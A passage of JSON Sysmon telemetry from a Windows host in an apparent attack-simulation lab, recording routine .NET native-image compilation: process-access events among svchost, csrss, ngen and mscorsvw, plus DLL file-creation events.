06:00:04.418","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-00102EA81100}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7834,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:07.372\r\nProcessGuid: {A837DB8D-04E4-5F25-0000-00102EA81100}\r\nProcessId: 632\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\278-0\\System.Web.DataVisualization.dll\r\nCreationUtcTime: 2020-08-01 06:00:07.372","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:07.372","ProcessGuid":"{A837DB8D-04E4-5F25-0000-00102EA81100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\278-0\\System.Web.DataVisualization.dll","CreationUtcTime":"2020-08-01 06:00:07.372","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7835,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.465\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04E7-5F25-0000-001040AD1100}\r\nTargetProcessId: 1820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.465","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04E7-5F25-0000-001040AD1100}","TargetProcessId":"1820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7836,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.481\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04E7-5F25-0000-001040AD1100}\r\nTargetProcessId: 1820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.481","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04E7-5F25-0000-001040AD1100}","TargetProcessId":"1820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7837,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.481\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E7-5F25-0000-001040AD1100}\r\nTargetProcessId: 1820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.481","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E7-5F25-0000-001040AD1100}","TargetProcessId":"1820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7838,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.528\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-001079E31000}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.528","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-001079E31000}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7839,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.528\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-001079E31000}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.528","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-001079E31000}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7840,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.543\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E7-5F25-0000-001038B11100}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.543","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E7-5F25-0000-001038B11100}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7841,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:07.762\r\nProcessGuid: {A837DB8D-04E7-5F25-0000-001038B11100}\r\nProcessId: 5100\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ec-0\\System.Web.DataVisualization.Design.dll\r\nCreationUtcTime: 2020-08-01 06:00:07.762","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:07.762","ProcessGuid":"{A837DB8D-04E7-5F25-0000-001038B11100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ec-0\\System.Web.DataVisualization.Design.dll","CreationUtcTime":"2020-08-01 06:00:07.762","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7842,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.793\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-0010BAE61000}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 